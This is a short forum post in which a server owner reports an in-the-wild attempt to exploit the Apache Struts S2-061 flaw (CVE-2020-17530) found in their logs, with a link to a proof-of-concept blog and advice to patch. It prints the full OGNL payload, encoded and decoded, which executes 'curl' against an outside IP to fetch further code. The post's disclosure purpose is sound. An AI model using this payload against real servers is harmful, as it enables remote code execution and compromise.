The S2-061 Struts remote code execution vulnerability (CVE-2020-17530) in the WILD

S2-061 Struts remote code execution vulnerability (CVE-2020-17530) on December 08, 2020 by apache and its marked “difficult to weaponize” by most sites i’ve checked after finding this request. Today looking at my server logs I found a ‘GET’ request with these:(I wont remove anything it might help a reseacher make sense of it)

"GET /?id=%25%7B%28%27Powered_by_Unicode_Potats0%2Cenjoy_it%27%29.%28%23UnicodeSec+%3D+%23application%5B%27org.apache.tomcat.InstanceManager%27%5D%29.%28%23potats0%3D%23UnicodeSec.newInstance%28%27org.apache.commons.collections.BeanMap%27%29%29.%28%23stackvalue%3D%23attr%5B%27struts.valueStack%27%5D%29.%28%23potats0.setBean%28%23stackvalue%29%29.%28%23context%3D%23potats0.get%28%27context%27%29%29.%28%23potats0.setBean%28%23context%29%29.%28%23sm%3D%23potats0.get%28%27memberAccess%27%29%29.%28%23emptySet%3D%23UnicodeSec.newInstance%28%27java.util.HashSet%27%29%29.%28%23potats0.setBean%28%23sm%29%29.%28%23potats0.put%28%27excludedClasses%27%2C%23emptySet%29%29.%28%23potats0.put%28%27excludedPackageNames%27%2C%23emptySet%29%29.%28%23exec%3D%23UnicodeSec.newInstance%28%27freemarker.template.utility.Execute%27%29%29.%28%23cmd%3D%7B%27curl+93.189.44.137%2Fssa%27%7D%29.%28%23res%3D%23exec.exec%28%23cmd%29%29%7D HTTP/1.0"

Decoding the URL

{('Powered_by_Unicode_Potats0,enjoy_it').(#UnicodeSec = #application['org.apache.tomcat.InstanceManager']).(#potats0=#UnicodeSec.newInstance('org.apache.commons.collections.BeanMap')).(#stackvalue=#attr['struts.valueStack']).(#potats0.setBean(#stackvalue)).(#context=#potats0.get('context')).(#potats0.setBean(#context)).(#sm=#potats0.get('memberAccess')).(#emptySet=#UnicodeSec.newInstance('java.util.HashSet')).(#potats0.setBean(#sm)).(#potats0.put('excludedClasses',#emptySet)).(#potats0.put('excludedPackageNames',#emptySet)).(#exec=#UnicodeSec.newInstance('freemarker.template.utility.Execute')).(#cmd={'curl 93.189.44.137/ssa'}).(#res=#exec.exec(#cmd))}

Decoding it and a little google search I found this chinese site that had described the POC with example of the real exploitation “https://www.cnblogs.com/potatsoSec/p/14111163.html”. With the site having the name “potatso” and the exploit having “potats0” is it a coincidence or is it a script-kiddie who just copied the code and tried just hitting anything online?? The IP 93[.]189[.]44[.]137 which curl calls is from Russia though. Researching on the exploit its marked “difficult to weaponize”. I still dont know if this is necessary or it might help but Id say just patch even if its marked with low risk.

2 Likes